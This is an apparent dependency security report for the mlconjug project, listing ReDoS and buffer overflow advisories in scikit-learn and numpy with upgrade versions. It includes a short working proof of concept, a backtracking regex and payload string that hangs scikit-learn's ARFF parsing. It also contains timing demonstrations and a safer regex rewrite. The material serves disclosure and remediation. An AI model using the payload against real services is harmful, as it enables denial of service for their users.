medium severity
 Vulnerable module: scikit-learn
 Introduced through: scikit-learn@0.20.4
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4
Remediation: Upgrade to scikit-learn@0.24.2.
Overview
scikit-learn is a Python module for machine learning built on top of SciPy and is distributed under the 3-Clause BSD license.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in ARFF processing.
PoC
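import re
# ARFF nominal-type pattern; the nested alternation under * causes the backtracking
p = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$')
# No closing brace, so the match fails only after exhaustive backtracking
re.findall(p, "{"+"',"*100)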
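The PoC above does not finish in any practical time with 100 repetitions. A bounded variant makes the growth observable without hanging the interpreter. This is only a sketch: the helper name `time_poc` and the chosen repetition counts are illustrative assumptions, and the timings depend on the machine and Python version.

```python
import re
import time

# Same expression as in the PoC (the ARFF nominal-type pattern).
PATTERN = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$')


def time_poc(repeats: int) -> tuple[list, float]:
    """Run the PoC payload with `repeats` copies of "'," and time it."""
    payload = "{" + "'," * repeats  # no closing brace, so no match is possible
    start = time.perf_counter()
    result = PATTERN.findall(payload)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    # Keep the counts small: the running time grows very quickly with `repeats`.
    for repeats in range(4, 13, 2):
        result, seconds = time_poc(repeats)
        print(f"repeats={repeats:2d} matches={result} seconds={seconds:.4f}")
```

Each step of two extra repetitions should take noticeably longer than the previous one, while the result stays an empty list.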
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportionate amount of time to process.
Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A - The string must start with the letter 'A'.
(B|C+)+ - The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D - Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
Testing the expression against a valid 30-character string takes about 52ms. Given an invalid string of the same length, the test takes nearly two seconds, roughly 35 times as long. The dramatic difference is due to the way regular expressions are evaluated.
Most regex engines work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
 CCC
 CC+C
 C+CC
 C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. Combined with the other steps the engine must take, the RegEx 101 debugger shows that the engine takes a total of 38 steps before it can determine the string doesn't match.
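The four splits listed above can be enumerated mechanically. The sketch below uses a hypothetical helper, `splits`, that cuts a run of characters into consecutive non-empty groups. It counts candidate groupings only, not the engine's actual steps, so the numbers are not expected to equal the debugger's step counts.

```python
from itertools import product


def splits(run: str) -> list[str]:
    """List every way to cut `run` into consecutive non-empty groups."""
    if not run:
        return []
    results = []
    # Each of the len(run) - 1 gaps between characters is either cut or not.
    for cuts in product([False, True], repeat=len(run) - 1):
        pieces = [run[0]]
        for char, cut in zip(run[1:], cuts):
            if cut:
                pieces.append(char)  # start a new group at this gap
            else:
                pieces[-1] += char   # extend the current group
        results.append("+".join(pieces))
    return results


print(splits("CCC"))
print(len(splits("C" * 14)))
```

Because every gap between two C's doubles the number of groupings, a run of n C's has 2^(n-1) of them, which is consistent with the exponential growth described here.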
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps
--- | --- | ---
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. In these extreme cases the engine works very slowly (the step count grows exponentially with input size, as shown above), which an attacker can exploit to make the service consume excessive CPU, resulting in a Denial of Service.
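One general way to avoid this blow-up is to remove the nested quantifier. The sketch below is an illustration only, not the change made in scikit-learn: it assumes that `(B|C+)+` and `[BC]+` accept the same strings (any non-empty run of B's and C's), and the names `VULNERABLE`, `LINEAR` and `agree` are hypothetical. It uses `fullmatch`, so the whole string must match, unlike the unanchored `.test` calls above.

```python
import re

VULNERABLE = re.compile(r"A(B|C+)+D")  # nested quantifier from the example
LINEAR = re.compile(r"A[BC]+D")        # assumed equivalent, single quantifier

# Short inputs only: the vulnerable pattern is safe to run on these.
SAMPLES = ["ABBD", "ABCCCCD", "ABCBCCCD", "ACCCCCD", "ACCCX", "AD"]


def agree(text: str) -> bool:
    """Check that both patterns accept or reject `text` identically."""
    return bool(VULNERABLE.fullmatch(text)) == bool(LINEAR.fullmatch(text))


for sample in SAMPLES:
    print(sample, bool(LINEAR.fullmatch(sample)), agree(sample))

# The rewritten pattern rejects a long invalid input without exponential work.
long_invalid = "A" + "C" * 100_000 + "X"
print(LINEAR.fullmatch(long_invalid))
```

With a single quantifier there is only one way to consume each character, so a failed match costs work proportional to the input length rather than to the number of possible groupings.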
Remediation
Upgrade scikit-learn to version 0.24.2 or higher.
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6
Remediation: Upgrade to numpy@1.22.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6
Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.
Remediation
Upgrade numpy to version 1.22.0 or higher.
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6
Remediation: Upgrade to numpy@1.21.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6
Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.
Remediation
Upgrade numpy to version 1.21.0rc1 or higher.
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6
Remediation: Upgrade to numpy@1.22.0.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6
Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to cause API calls to fail by constructing specific string objects.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.
Remediation
Upgrade numpy to version 1.22.0rc1 or higher.
low severity
 Vulnerable module: numpy
 Introduced through: numpy@1.16.6, scipy@1.2.3 and others
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › numpy@1.16.6
Remediation: Upgrade to numpy@1.22.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scipy@1.2.3 › numpy@1.16.6
Remediation: Upgrade to scipy@1.9.2.

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › numpy@1.16.6

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4 › scipy@1.2.3 › numpy@1.16.6
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repeatedly creating and sorting arrays.
Note: This is likely to happen only if application memory is already exhausted, as it requires the newdescr object of PyArray_DescrNew to evaluate to NULL.
Remediation
Upgrade numpy to version 1.22.2 or higher.
low severity
 Vulnerable module: scikit-learn
 Introduced through: scikit-learn@0.20.4
Detailed paths

Introduced through: SekouD/mlconjug@SekouD/mlconjug#840e990bd96b56785a68712e9729582ede168ec2 › scikit-learn@0.20.4
Remediation: Upgrade to scikit-learn@0.24.2.
Overview
scikit-learn is a Python module for machine learning built on top of SciPy and is distributed under the 3-Clause BSD license.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the _RE_TYPE_NOMINAL regular expression which is evaluated in _decode_attribute.
Remediation
Upgrade scikit-learn to version 0.24.2 or higher.
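The remediation versions listed in this report can be checked against the pinned versions with a few lines of standard-library Python. This is a rough sketch under stated assumptions: `release_tuple` and `meets_minimum` are hypothetical helpers, pre-release suffixes such as `rc1` are ignored, and the version numbers are copied from this report (taking the highest numpy minimum mentioned, 1.22.2).

```python
import re


def release_tuple(version: str, width: int = 3) -> tuple:
    """Return the leading numeric release segment, e.g. '1.21.0rc1' -> (1, 21, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version: {version!r}")
    parts = [int(part) for part in match.group().split(".")]
    parts += [0] * (width - len(parts))  # pad so '1.22' compares like '1.22.0'
    return tuple(parts)


def meets_minimum(installed: str, minimum: str) -> bool:
    """Compare release segments only; suffixes like 'rc1' are ignored (assumption)."""
    return release_tuple(installed) >= release_tuple(minimum)


# (pinned version, minimum fixed version), both taken from this report.
REPORT = {
    "numpy": ("1.16.6", "1.22.2"),
    "scipy": ("1.2.3", "1.9.2"),
    "scikit-learn": ("0.20.4", "0.24.2"),
}

outdated = [
    name
    for name, (pinned, minimum) in REPORT.items()
    if not meets_minimum(pinned, minimum)
]
print(outdated)
```

For real projects a full version parser is a safer choice, since this sketch does not order pre-releases or other suffixes.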